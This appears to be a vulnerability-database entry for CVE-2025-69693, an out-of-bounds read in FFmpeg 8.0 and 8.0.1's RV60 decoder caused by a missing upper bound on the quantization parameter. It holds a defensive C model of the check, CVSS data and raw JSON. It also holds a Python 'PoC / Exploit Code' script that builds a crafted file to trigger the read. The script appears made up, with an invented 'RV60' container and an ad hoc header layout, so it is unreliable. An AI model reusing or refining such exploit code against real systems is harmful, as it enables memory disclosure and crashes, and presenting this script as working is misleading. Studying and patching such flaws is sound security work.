Security Vulnerability Report
CVE-2025-69693 CVSS 5.4 MEDIUM

Published: 2026-03-16 20:16:15
Last Modified: 2026-03-19 14:19:12

Description

Out-of-bounds read in FFmpeg 8.0 and 8.0.1 RV60 video decoder (libavcodec/rv60dec.c). The quantization parameter (qp) validation at line 2267 only checks the lower bound (qp < 0) but is missing upper bound validation. The qp value can reach 65 (base value 63 from 6-bit frame header + offset +2 from read_qp_offset) while the rv60_qp_to_idx array has size 64 (valid indices 0-63). This results in out-of-bounds array access at lines 1554 (decode_cbp8), 1655 (decode_cbp16), and 1419/1421 (get_c4x4_set), potentially leading to memory disclosure or crash. A previous fix in commit 61cbcaf93f added validation only for intra frames. This vulnerability affects the released versions 8.0 (released 2025-08-22) and 8.0.1 (released 2025-11-20) and is fixed in git master commit 8abeb879df which will be included in FFmpeg 8.1.
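
A simplified model of the range check described above, added here as an illustration; it is not FFmpeg's source. The table contents, the function names and the 0..+2 offset range passed to the counter are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>

#define QP_TABLE_SIZE 64   /* size the description gives for rv60_qp_to_idx */

static uint8_t qp_table_model[QP_TABLE_SIZE];   /* constructed stand-in, zero-filled */

/* Effective qp as the description gives it: 6-bit header value plus an offset. */
static int effective_qp(unsigned base6, int offset)
{
    return (int)(base6 & 0x3F) + offset;
}

/* The check as described for 8.0 / 8.0.1: lower bound only. */
static int qp_ok_lower_only(int qp) { return qp >= 0; }

/* Hardened check: the value must also be a valid table index. */
static int qp_ok_both_bounds(int qp) { return qp >= 0 && qp < QP_TABLE_SIZE; }

/* Bounds-checked lookup: 0 on success, -1 when qp is rejected. */
static int lookup_idx(int qp, uint8_t *out)
{
    if (!qp_ok_both_bounds(qp))
        return -1;
    *out = qp_table_model[qp];
    return 0;
}

/* Count (base, offset) pairs that the lower-bound-only check accepts
 * although the resulting qp is not a valid table index. */
static int count_unchecked_pairs(int min_off, int max_off)
{
    int n = 0;
    for (unsigned base = 0; base < 64; base++)
        for (int off = min_off; off <= max_off; off++) {
            int qp = effective_qp(base, off);
            if (qp_ok_lower_only(qp) && !qp_ok_both_bounds(qp))
                n++;
        }
    return n;
}

int main(void)
{
    uint8_t idx;
    printf("qp=%d lower-only=%d both=%d lookup=%d\n", effective_qp(63, 2),
           qp_ok_lower_only(65), qp_ok_both_bounds(65), lookup_idx(65, &idx));
    printf("pairs past the table with offsets 0..2: %d\n", count_unchecked_pairs(0, 2));
    return 0;
}
```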

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ffmpeg:ffmpeg:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ffmpeg:ffmpeg:8.0.1:*:*:*:*:*:*:* - VULNERABLE
FFmpeg 8.0 (released 2025-08-22)
FFmpeg 8.0.1 (released 2025-11-20)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


def create_malicious_rv60():
    """Generate PoC for CVE-2025-69693 - FFmpeg RV60 qp validation bypass"""
    # RV60 frame header structure
    header = bytearray()

    # Frame type: Intra frame (1) or Inter frame (0)
    frame_type = 0x00  # Inter frame - bypasses previous partial fix

    # 6-bit base qp value (0-63 valid, set to max to trigger overflow)
    base_qp = 0x3F  # 63 in 6 bits

    # QP offset field (adds +1 to +2 to base qp)
    qp_offset = 0x02  # This makes effective qp = 63 + 2 = 65 (> 64)

    # Construct malicious frame header
    header_byte = (base_qp & 0x3F) | ((qp_offset & 0x03) << 6)
    header.append(header_byte)
    header.append(frame_type)

    # Add padding to reach vulnerable code paths
    header.extend(b'\x00' * 100)

    # File format: RV60 video container
    with open('CVE-2025-69693-poc.rv60', 'wb') as f:
        # RV60 container header
        f.write(b'RV60')  # Magic number
        f.write(struct.pack('<I', 1))  # Version
        f.write(struct.pack('<I', len(header)))  # Frame size
        f.write(header)

    print(f"PoC file created: CVE-2025-69693-poc.rv60")
    print(f"QP value will be: {base_qp} + {qp_offset} = {base_qp + qp_offset}")
    print(f"Array size: 64, causing out-of-bounds access at index {base_qp + qp_offset}")


if __name__ == '__main__':
    create_malicious_rv60()
    print("\nUsage: Process this file with FFmpeg 8.0/8.0.1 to trigger vulnerability")
```

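References

https://github.com/FFmpeg/FFmpeg/commit/8abeb879df66ea8d27ce1735925ced5a30813de4 (Patch)
https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0 (Product, Release Notes)
https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0.1 (Product, Release Notes)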

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69693", "sourceIdentifier": "[email protected]", "published": "2026-03-16T20:16:15.060", "lastModified": "2026-03-19T14:19:12.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read in FFmpeg 8.0 and 8.0.1 RV60 video decoder (libavcodec/rv60dec.c). The quantization parameter (qp) validation at line 2267 only checks the lower bound (qp < 0) but is missing upper bound validation. The qp value can reach 65 (base value 63 from 6-bit frame header + offset +2 from read_qp_offset) while the rv60_qp_to_idx array has size 64 (valid indices 0-63). This results in out-of-bounds array access at lines 1554 (decode_cbp8), 1655 (decode_cbp16), and 1419/1421 (get_c4x4_set), potentially leading to memory disclosure or crash. A previous fix in commit 61cbcaf93f added validation only for intra frames. This vulnerability affects the released versions 8.0 (released 2025-08-22) and 8.0.1 (released 2025-11-20) and is fixed in git master commit 8abeb879df which will be included in FFmpeg 8.1."}, {"lang": "es", "value": "Lectura fuera de límites en el decodificador de video RV60 de FFmpeg 8.0 y 8.0.1 (libavcodec/rv60dec.c). La validación del parámetro de cuantificación (qp) en la línea 2267 solo verifica el límite inferior (qp < 0) pero carece de validación del límite superior. El valor de qp puede alcanzar 65 (valor base 63 del encabezado de trama de 6 bits + desplazamiento +2 de read_qp_offset) mientras que el array rv60_qp_to_idx tiene un tamaño de 64 (índices válidos 0-63). Esto resulta en acceso a array fuera de límites en las líneas 1554 (decode_cbp8), 1655 (decode_cbp16) y 1419/1421 (get_c4x4_set), lo que podría llevar a la divulgación de memoria o a un fallo. Una corrección anterior en el commit 61cbcaf93f añadió validación solo para fotogramas intra. Esta vulnerabilidad afecta a las versiones publicadas 8.0 (publicada el 22-08-2025) y 8.0.1 (publicada el 20-11-2025) y está corregida en el commit maestro de git 8abeb879df que se incluirá en FFmpeg 8.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ffmpeg:ffmpeg:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "E3BC8327-6529-4B32-B7AF-FCAB3BDF8B42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ffmpeg:ffmpeg:8.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "7F5CACA2-6FB6-4D6D-92D0-C9FF0E7CDB14"}]}]}], "references": [{"url": "https://github.com/FFmpeg/FFmpeg/commit/8abeb879df66ea8d27ce1735925ced5a30813de4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/FFmpeg/FFmpeg/releases/tag/n8.0.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}]}}